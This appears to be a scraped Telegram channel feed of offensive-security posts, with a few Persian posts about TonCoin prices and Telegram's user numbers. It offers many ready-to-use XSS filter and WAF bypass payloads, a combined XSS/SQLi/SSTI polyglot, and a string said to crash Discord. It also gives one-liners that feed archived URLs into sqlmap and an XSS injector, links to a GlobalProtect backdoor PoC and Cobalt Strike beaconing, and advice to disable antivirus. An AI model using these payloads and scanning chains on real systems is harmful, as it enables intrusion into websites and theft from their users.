this string crashes discord 🤕
#trick #discord
——————
0Day.Today
@LearnExploit
@Tech_Army
http://./\<#0>: ://./<#0>#trick #discord
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4⚡1❤1🆒1
⚡2👍1
Genzai helps you identify IoT or Internet of Things related dashboards across a single or set of targets provided as an input and furthermore scan them for default password issues and potential vulnerabilities based on paths and versions.
LearnExploit#GO #iot #Security #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡3🔥3👍1
Nice collection of XSS filters bypasses 💎
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
❤3👍2❤🔥1
XSS payload ⚡️
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )<a href=[�]"� onmouseover=prompt(1)//">XYZ</a><script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg><script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍3❤1
قیمت Ton هم شده 7 دلار 🔥
قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار 😵💎
پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️
——————
0Day.Today
@LearnExploit
@Tech_Army
قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار 😵💎
پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️
——————
0Day.Today
@LearnExploit
@Tech_Army
👍2
پاول دورف اعلام کرده که تعداد کاربران فعال تلگرام از مرز ۹۰۰ میلیون کاربر در ماه عبور کرده و این اپ ۶امین اپ پراستفاده و پردانلود در جهان هست.
درامدهای تلگرام در فصل اول ۲۰۲۴ از هزینه هاش فراتر رفته و به گفته دورف این اپ امسال به سوددهی میرسه.
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
درامدهای تلگرام در فصل اول ۲۰۲۴ از هزینه هاش فراتر رفته و به گفته دورف این اپ امسال به سوددهی میرسه.
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
GraphStrike: Cobalt Strike HTTPS beaconing over Microsoft Graph API
Link
#cobalt_strike #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#cobalt_strike #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
XSS Tip 🥵
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
❤3❤🔥3🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
CrimsonEDR
💬
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
🔼 Installation:
⚪️ Install dependancy:
⚪️ Download repository
⚪️ Compile the project:
⚠️ Warning:
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
💻 Example:
😸 Github
⬇️ Download
🔒
#C #Simulate #Malware #Dev
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
sudo apt-get install gcc-mingw-w64-x86-64cd CrimsonEDR;chmod +x compile.sh;./compile.shWindows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234LearnExploit#C #Simulate #Malware #Dev
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥3❤1👍1
Payload for XSS + SQLi + SSTI/CSTI !
#XSS #SQLI
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
'"><svg/onload=prompt(5);>{{7*7}}' ==> for Sql injection "><svg/onload=prompt(5);> ==> for XSS {{7*7}} ==> for SSTI/CSTI#XSS #SQLI
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥3❤1
SQLMap from Waybackurls
#Sqlmap #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"#Sqlmap #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥3❤2👍1
xss oneliner command
⬇️ Download ( Tools )
🔒
🔒
#XSS #BugBounty #Oneliner #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vulnBugCod3 ( ZIP )LearnExploit ( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡3❤2👍2
#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤2👍2🔥2
CVE-2024-31497: Critical PuTTY Vulnerability Exposes Private Keys
Link
#cve
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#cve
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1